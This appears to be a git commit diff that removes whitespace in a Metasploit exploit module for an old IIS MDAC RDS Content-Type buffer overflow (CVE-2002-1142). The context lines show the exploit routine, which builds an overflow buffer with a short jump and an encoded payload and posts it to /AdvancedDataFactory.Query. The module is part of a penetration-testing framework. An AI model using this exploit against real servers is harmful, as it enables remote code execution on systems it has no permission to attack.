Get rid of some whitespace
parent
e12cce775e
commit
42795fec00
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
|
||||
'Description' => %q{
|
||||
'Description' => %q{
|
||||
This module can be used to execute arbitrary code on IIS servers
|
||||
that expose the /msadc/msadcs.dll Microsoft Data Access Components
|
||||
(MDAC) Remote Data Service (RDS) DataFactory service. The service is
|
||||
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['BID', '6214'],
|
||||
['CVE', '2002-1142'],
|
||||
['MSB', 'ms02-065'],
|
||||
['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html'],
|
||||
['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
@ -79,10 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
sploit = rand_text_alphanumeric(136)
|
||||
sploit[24,2] = Rex::Arch::X86.jmp_short(117)
|
||||
|
@ -90,14 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << payload.encoded
|
||||
|
||||
data = 'Content-Type: ' + sploit
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['PATH'] + '/AdvancedDataFactory.Query',
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => data.length,
|
||||
},
|
||||
|
||||
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
})
|
||||
|
|
Loading…
Reference in New Issue